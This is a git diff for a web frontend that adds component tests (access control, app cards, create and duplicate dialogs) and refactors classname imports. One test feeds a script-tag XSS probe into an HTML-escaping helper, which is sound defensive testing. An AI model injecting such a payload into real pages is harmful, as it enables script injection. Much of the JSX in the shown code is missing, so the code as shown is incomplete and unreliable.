, + ) + + const closeButton = container.querySelector('.absolute.right-5.top-5') as HTMLElement + fireEvent.click(closeButton) + + await waitFor(() => { + expect(handleClose).toHaveBeenCalledTimes(1) + }) + }) +}) + +// SpecificGroupsOrMembers syncs store state with fetched data and supports removals +describe('SpecificGroupsOrMembers', () => { + it('should render collapsed view when not in specific selection mode', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + + render() + + expect(screen.getByText('app.accessControlDialog.accessItems.specific')).toBeInTheDocument() + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + it('should show loading state while pending', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: true, + data: undefined, + }) + + const { container } = render() + + await waitFor(() => { + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + }) + + it('should render fetched groups and members and support removal', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + + render() + + await waitFor(() => { + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + const groupItem = screen.getByText(baseGroup.name).closest('div') + const groupRemove = groupItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(groupRemove) + + await waitFor(() => { + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + const memberItem = screen.getByText(baseMember.name).closest('div') + const memberRemove = memberItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(memberRemove) + + await waitFor(() => { + 
expect(screen.queryByText(baseMember.name)).not.toBeInTheDocument() + }) + }) +}) + +// AddMemberOrGroupDialog renders search results and updates store selections +describe('AddMemberOrGroupDialog', () => { + it('should open search popover and display candidates', async () => { + const user = userEvent.setup() + + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByPlaceholderText('app.accessControlDialog.operateGroupAndMember.searchPlaceholder')).toBeInTheDocument() + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + it('should allow selecting members and expanding groups', async () => { + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + const expandButton = screen.getByText('app.accessControlDialog.operateGroupAndMember.expand') + await user.click(expandButton) + expect(useAccessControlStore.getState().selectedGroupsForBreadcrumb).toEqual([baseGroup]) + + const memberLabel = screen.getByText(baseMember.name) + const memberCheckbox = memberLabel.parentElement?.previousElementSibling as HTMLElement + fireEvent.click(memberCheckbox) + + expect(useAccessControlStore.getState().specificMembers).toEqual([baseMember]) + }) + + it('should show empty state when no candidates are returned', async () => { + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [] }, + }) + + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByText('app.accessControlDialog.operateGroupAndMember.noResult')).toBeInTheDocument() + }) +}) + +// AccessControl integrates dialog, selection items, and confirm flow +describe('AccessControl', () => { + it('should initialize menu from app and call update on confirm', async () => { + const onClose = 
jest.fn() + const onConfirm = jest.fn() + const toastSpy = jest.spyOn(Toast, 'notify').mockReturnValue({}) + useAccessControlStore.setState({ + specificGroups: [baseGroup], + specificMembers: [baseMember], + }) + const app = { + id: 'app-id-1', + access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + } as App + + render( + , + ) + + await waitFor(() => { + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.SPECIFIC_GROUPS_MEMBERS) + }) + + fireEvent.click(screen.getByText('common.operation.confirm')) + + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith({ + appId: app.id, + accessMode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + subjects: [ + { subjectId: baseGroup.id, subjectType: SubjectType.GROUP }, + { subjectId: baseMember.id, subjectType: SubjectType.ACCOUNT }, + ], + }) + expect(toastSpy).toHaveBeenCalled() + expect(onConfirm).toHaveBeenCalled() + }) + }) + + it('should expose the external members tip when SSO is disabled', () => { + const app = { + id: 'app-id-2', + access_mode: AccessMode.PUBLIC, + } as App + + render( + , + ) + + expect(screen.getByText('app.accessControlDialog.accessItems.external')).toBeInTheDocument() + expect(screen.getByText('app.accessControlDialog.accessItems.anyone')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx index e9519aeedf..17263fdd46 100644 --- a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx +++ b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx @@ -11,7 +11,7 @@ import Input from '../../base/input' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import Loading from '../../base/loading' import useAccessControlStore from '../../../../context/access-control-store' -import classNames from '@/utils/classnames' +import { cn } from 
'@/utils/classnames' import { useSearchForWhiteListCandidates } from '@/service/access-control' import type { AccessControlAccount, AccessControlGroup, Subject, SubjectAccount, SubjectGroup } from '@/models/access-control' import { SubjectType } from '@/models/access-control' @@ -32,7 +32,7 @@ export default function AddMemberOrGroupDialog() { const anchorRef = useRef(null) useEffect(() => { - const hasMore = data?.pages?.[0].hasMore ?? false + const hasMore = data?.pages?.[0]?.hasMore ?? false let observer: IntersectionObserver | undefined if (anchorRef.current) { observer = new IntersectionObserver((entries) => { @@ -106,7 +106,7 @@ function SelectedGroupsBreadCrumb() { setSelectedGroupsForBreadcrumb([]) }, [setSelectedGroupsForBreadcrumb]) return
- 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} + 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} {selectedGroupsForBreadcrumb.map((group, index) => { return
/ @@ -198,7 +198,7 @@ type BaseItemProps = { children: React.ReactNode } function BaseItem({ children, className }: BaseItemProps) { - return
+ return
{children}
} diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index 2dc45e1337..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -51,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -189,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { diff --git a/web/app/components/app/app-publisher/suggested-action.tsx b/web/app/components/app/app-publisher/suggested-action.tsx index 2535de6654..154bacc361 100644 --- a/web/app/components/app/app-publisher/suggested-action.tsx +++ b/web/app/components/app/app-publisher/suggested-action.tsx @@ -1,6 +1,6 @@ import type { HTMLProps, PropsWithChildren } from 'react' import { RiArrowRightUpLine } from '@remixicon/react' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type SuggestedActionProps = PropsWithChildren & { icon?: React.ReactNode @@ -19,11 +19,9 @@ const SuggestedAction = ({ icon, link, disabled, children, className, onClick, . href={disabled ? 
undefined : link} target='_blank' rel='noreferrer' - className={classNames( - 'flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', + className={cn('flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', disabled ? 'cursor-not-allowed opacity-30 shadow-xs' : 'cursor-pointer text-text-secondary hover:bg-state-accent-hover hover:text-text-accent', - className, - )} + className)} onClick={handleClick} {...props} > diff --git a/web/app/components/app/configuration/base/feature-panel/index.tsx b/web/app/components/app/configuration/base/feature-panel/index.tsx index ec5ab96d76..c9ebfefbe5 100644 --- a/web/app/components/app/configuration/base/feature-panel/index.tsx +++ b/web/app/components/app/configuration/base/feature-panel/index.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC, ReactNode } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IFeaturePanelProps = { className?: string diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx 
b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..615a1769e8 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,70 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.tsx b/web/app/components/app/configuration/base/operation-btn/index.tsx index aba35cded2..db19d2976e 100644 
--- a/web/app/components/app/configuration/base/operation-btn/index.tsx +++ b/web/app/components/app/configuration/base/operation-btn/index.tsx @@ -6,7 +6,7 @@ import { RiAddLine, RiEditLine, } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' export type IOperationBtnProps = { diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain(' & Special "Chars"', + }, 
+ } + render() + + expect(screen.getByText('App & Special "Chars"')).toBeInTheDocument() + }) + + it('should handle onCreate function throwing error', async () => { + const errorOnCreate = jest.fn(() => { + throw new Error('Create failed') + }) + + // Mock console.error to avoid test output noise + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + let capturedError: unknown + try { + await userEvent.click(button) + } + catch (err) { + capturedError = err + } + expect(errorOnCreate).toHaveBeenCalledTimes(1) + expect(consoleSpy).toHaveBeenCalled() + if (capturedError instanceof Error) + expect(capturedError.message).toContain('Create failed') + + consoleSpy.mockRestore() + }) + }) + + describe('Accessibility', () => { + it('should have proper elements for accessibility', () => { + const { container } = render() + + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + it('should have title attribute for app name when truncated', () => { + render() + + const nameElement = screen.getByText('Test Chat App') + expect(nameElement).toHaveAttribute('title', 'Test Chat App') + }) + + it('should have accessible button with proper label', () => { + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + expect(button).toBeEnabled() + expect(button).toHaveTextContent('app.newApp.useTemplate') + }) + }) + + describe('User-Visible Behavior Tests', () => { + it('should show plus icon in create button', () => { + render() + + expect(screen.getByTestId('plus-icon')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-dialog/app-card/index.tsx b/web/app/components/app/create-app-dialog/app-card/index.tsx index 7f7ede0065..df35a74ec7 100644 --- a/web/app/components/app/create-app-dialog/app-card/index.tsx +++ 
b/web/app/components/app/create-app-dialog/app-card/index.tsx @@ -3,7 +3,7 @@ import { useTranslation } from 'react-i18next' import { PlusIcon } from '@heroicons/react/20/solid' import { AppTypeIcon, AppTypeLabel } from '../../type-selector' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { App } from '@/models/explore' import AppIcon from '@/app/components/base/app-icon' @@ -15,6 +15,7 @@ export type AppCardProps = { const AppCard = ({ app, + canCreate, onCreate, }: AppCardProps) => { const { t } = useTranslation() @@ -45,14 +46,16 @@ const AppCard = ({ {app.description}
- ) } diff --git a/web/app/components/app/create-app-dialog/app-list/index.tsx b/web/app/components/app/create-app-dialog/app-list/index.tsx index 51b6874d52..4655d7a676 100644 --- a/web/app/components/app/create-app-dialog/app-list/index.tsx +++ b/web/app/components/app/create-app-dialog/app-list/index.tsx @@ -11,7 +11,7 @@ import AppCard from '../app-card' import Sidebar, { AppCategories, AppCategoryLabel } from './sidebar' import Toast from '@/app/components/base/toast' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import ExploreContext from '@/context/explore-context' import type { App } from '@/models/explore' import { fetchAppDetail, fetchAppList } from '@/service/explore' diff --git a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx index 85c55c5385..89062cdcf9 100644 --- a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx +++ b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx @@ -1,7 +1,7 @@ 'use client' import { RiStickyNoteAddLine, RiThumbUpLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '@/app/components/base/divider' export enum AppCategories { @@ -40,13 +40,13 @@ type CategoryItemProps = { } function CategoryItem({ category, active, onClick }: CategoryItemProps) { return
  • { onClick?.(category) }}> {category === AppCategories.RECOMMENDED &&
    } + className={cn('system-sm-medium text-components-menu-item-text group-hover:text-components-menu-item-text-hover group-[.active]:text-components-menu-item-text-active', active && 'system-sm-semibold')} />
  • } diff --git a/web/app/components/app/create-app-dialog/index.spec.tsx b/web/app/components/app/create-app-dialog/index.spec.tsx new file mode 100644 index 0000000000..db4384a173 --- /dev/null +++ b/web/app/components/app/create-app-dialog/index.spec.tsx @@ -0,0 +1,287 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import CreateAppTemplateDialog from './index' + +// Mock external dependencies (not base components) +jest.mock('./app-list', () => { + return function MockAppList({ + onCreateFromBlank, + onSuccess, + }: { + onCreateFromBlank?: () => void + onSuccess: () => void + }) { + return ( +
    + + {onCreateFromBlank && ( + + )} +
    + ) + } +}) + +jest.mock('ahooks', () => ({ + useKeyPress: jest.fn((_key: string, _callback: () => void) => { + // Mock implementation for testing + return jest.fn() + }), +})) + +describe('CreateAppTemplateDialog', () => { + const defaultProps = { + show: false, + onSuccess: jest.fn(), + onClose: jest.fn(), + onCreateFromBlank: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should not render when show is false', () => { + render() + + // FullScreenModal should not render any content when open is false + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + + it('should render modal when show is true', () => { + render() + + // FullScreenModal renders with role="dialog" + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + + it('should render create from blank button when onCreateFromBlank is provided', () => { + render() + + expect(screen.getByTestId('create-from-blank')).toBeInTheDocument() + }) + + it('should not render create from blank button when onCreateFromBlank is not provided', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + render() + + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should pass show prop to FullScreenModal', () => { + const { rerender } = render() + + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + + rerender() + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should pass closable prop to FullScreenModal', () => { + // Since the FullScreenModal is always rendered with closable=true + // we can verify that the modal renders with the proper structure + render() + + // Verify that the modal has the proper dialog structure + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + 
expect(dialog).toHaveAttribute('aria-modal', 'true') + }) + }) + + describe('User Interactions', () => { + it('should handle close interactions', () => { + const mockOnClose = jest.fn() + render() + + // Test that the modal is rendered + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + + // Test that AppList component renders (child component interactions) + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.getByTestId('app-list-success')).toBeInTheDocument() + }) + + it('should call both onSuccess and onClose when app list success is triggered', () => { + const mockOnSuccess = jest.fn() + const mockOnClose = jest.fn() + render() + + fireEvent.click(screen.getByTestId('app-list-success')) + + expect(mockOnSuccess).toHaveBeenCalledTimes(1) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onCreateFromBlank when create from blank is clicked', () => { + const mockOnCreateFromBlank = jest.fn() + render() + + fireEvent.click(screen.getByTestId('create-from-blank')) + + expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1) + }) + }) + + describe('useKeyPress Integration', () => { + it('should set up ESC key listener when modal is shown', () => { + const { useKeyPress } = require('ahooks') + + render() + + expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function)) + }) + + it('should handle ESC key press to close modal', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + expect(capturedCallback).toBeDefined() + expect(typeof capturedCallback).toBe('function') + + // Simulate ESC key press + capturedCallback?.() + + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when ESC key is pressed and modal is not 
shown', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + // The callback should still be created but not execute onClose + expect(capturedCallback).toBeDefined() + + // Simulate ESC key press + capturedCallback?.() + + // onClose should not be called because modal is not shown + expect(mockOnClose).not.toHaveBeenCalled() + }) + }) + + describe('Callback Dependencies', () => { + it('should create stable callback reference for ESC key handler', () => { + const { useKeyPress } = require('ahooks') + + render() + + // Verify that useKeyPress was called with a function + const calls = useKeyPress.mock.calls + expect(calls.length).toBeGreaterThan(0) + expect(calls[0][0]).toBe('esc') + expect(typeof calls[0][1]).toBe('function') + }) + }) + + describe('Edge Cases', () => { + it('should handle null props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle undefined props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle rapid show/hide toggles', () => { + // Test initial state + const { unmount } = render() + unmount() + + // Test show state + render() + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Test hide state + render() + // Due to transition animations, we just verify the component handles the prop change + expect(() => render()).not.toThrow() + }) + + it('should handle missing optional onCreateFromBlank prop', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + + it('should work 
with all required props only', () => { + const requiredProps = { + show: true, + onSuccess: jest.fn(), + onClose: jest.fn(), + } + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-modal/index.tsx b/web/app/components/app/create-app-modal/index.tsx index a449ec8ef2..d74715187f 100644 --- a/web/app/components/app/create-app-modal/index.tsx +++ b/web/app/components/app/create-app-modal/index.tsx @@ -13,7 +13,7 @@ import AppIconPicker from '../../base/app-icon-picker' import type { AppIconSelection } from '../../base/app-icon-picker' import Button from '@/app/components/base/button' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { basePath } from '@/utils/var' import { useAppContext } from '@/context/app-context' import { useProviderContext } from '@/context/provider-context' diff --git a/web/app/components/app/create-from-dsl-modal/index.tsx b/web/app/components/app/create-from-dsl-modal/index.tsx index 3564738dfd..0d30a2abac 100644 --- a/web/app/components/app/create-from-dsl-modal/index.tsx +++ b/web/app/components/app/create-from-dsl-modal/index.tsx @@ -25,7 +25,7 @@ import { useProviderContext } from '@/context/provider-context' import AppsFull from '@/app/components/billing/apps-full-in-dialog' import { NEED_REFRESH_APP_LIST_KEY } from '@/config' import { getRedirection } from '@/utils/app-redirection' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { usePluginDependencies } from '@/app/components/workflow/plugin-dependency/hooks' import { noop } from 'lodash-es' import { trackEvent } from '@/app/components/base/amplitude' diff --git a/web/app/components/app/create-from-dsl-modal/uploader.tsx b/web/app/components/app/create-from-dsl-modal/uploader.tsx index 
b6644da5a4..2745ca84c6 100644 --- a/web/app/components/app/create-from-dsl-modal/uploader.tsx +++ b/web/app/components/app/create-from-dsl-modal/uploader.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { formatFileSize } from '@/utils/format' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Yaml as YamlIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import ActionButton from '@/app/components/base/action-button' diff --git a/web/app/components/app/duplicate-modal/index.spec.tsx b/web/app/components/app/duplicate-modal/index.spec.tsx new file mode 100644 index 0000000000..2d73addeab --- /dev/null +++ b/web/app/components/app/duplicate-modal/index.spec.tsx @@ -0,0 +1,167 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DuplicateAppModal from './index' +import Toast from '@/app/components/base/toast' +import type { ProviderContextState } from '@/context/provider-context' +import { baseProviderContextValue } from '@/context/provider-context' +import { Plan } from '@/app/components/billing/type' + +const appsFullRenderSpy = jest.fn() +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) => { + appsFullRenderSpy(loc) + return
    AppsFull
    + }, +})) + +const useProviderContextMock = jest.fn() +jest.mock('@/context/provider-context', () => { + const actual = jest.requireActual('@/context/provider-context') + return { + ...actual, + useProviderContext: () => useProviderContextMock(), + } +}) + +const renderComponent = (overrides: Partial> = {}) => { + const onConfirm = jest.fn().mockResolvedValue(undefined) + const onHide = jest.fn() + const props: React.ComponentProps = { + appName: 'My App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + show: true, + onConfirm, + onHide, + ...overrides, + } + const utils = render() + return { + ...utils, + onConfirm, + onHide, + } +} + +const setupProviderContext = (overrides: Partial = {}) => { + useProviderContextMock.mockReturnValue({ + ...baseProviderContextValue, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { + ...baseProviderContextValue.plan.usage, + buildApps: 0, + }, + total: { + ...baseProviderContextValue.plan.total, + buildApps: 10, + }, + }, + enableBilling: false, + ...overrides, + } as ProviderContextState) +} + +describe('DuplicateAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + setupProviderContext() + }) + + // Rendering output based on modal visibility. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.duplicateTitle')).toBeInTheDocument() + expect(screen.getByDisplayValue('My App')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.duplicateTitle')).not.toBeInTheDocument() + }) + }) + + // Prop-driven states such as full plan handling. 
+ describe('Props', () => { + it('should disable duplicate button and show apps full content when plan is full', () => { + // Arrange + setupProviderContext({ + enableBilling: true, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { ...baseProviderContextValue.plan.usage, buildApps: 10 }, + total: { ...baseProviderContextValue.plan.total, buildApps: 10 }, + }, + }) + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.duplicate' })).toBeDisabled() + }) + }) + + // User interactions for cancel and confirm flows. + describe('Interactions', () => { + it('should call onHide when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onHide } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + + it('should show error toast when name is empty', async () => { + const user = userEvent.setup() + const toastSpy = jest.spyOn(Toast, 'notify') + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(toastSpy).toHaveBeenCalledWith({ type: 'error', message: 'explore.appCustomize.nameRequired' }) + expect(onConfirm).not.toHaveBeenCalled() + expect(onHide).not.toHaveBeenCalled() + }) + + it('should submit app info and hide modal when duplicate is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.type(screen.getByRole('textbox'), 'New App') + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(onConfirm).toHaveBeenCalledWith({ + name: 'New App', + 
icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/duplicate-modal/index.tsx b/web/app/components/app/duplicate-modal/index.tsx index f98fb831ed..f25eb5373d 100644 --- a/web/app/components/app/duplicate-modal/index.tsx +++ b/web/app/components/app/duplicate-modal/index.tsx @@ -3,7 +3,7 @@ import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Modal from '@/app/components/base/modal' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/log-annotation/index.tsx b/web/app/components/app/log-annotation/index.tsx index c0b0854b29..e7c2be3eed 100644 --- a/web/app/components/app/log-annotation/index.tsx +++ b/web/app/components/app/log-annotation/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useMemo } from 'react' import { useTranslation } from 'react-i18next' import { useRouter } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Log from '@/app/components/app/log' import WorkflowLog from '@/app/components/app/workflow-log' import Annotation from '@/app/components/app/annotation' diff --git a/web/app/components/app/log/list.tsx b/web/app/components/app/log/list.tsx index 0ff375d815..e479cbe881 100644 --- a/web/app/components/app/log/list.tsx +++ b/web/app/components/app/log/list.tsx @@ -39,7 +39,7 @@ import Tooltip from '@/app/components/base/tooltip' import CopyIcon from '@/app/components/base/copy-icon' import { buildChatItemTree, getThreadMessages } from '@/app/components/base/chat/utils' import { getProcessedFilesFromResponse } from '@/app/components/base/file-uploader/utils' 
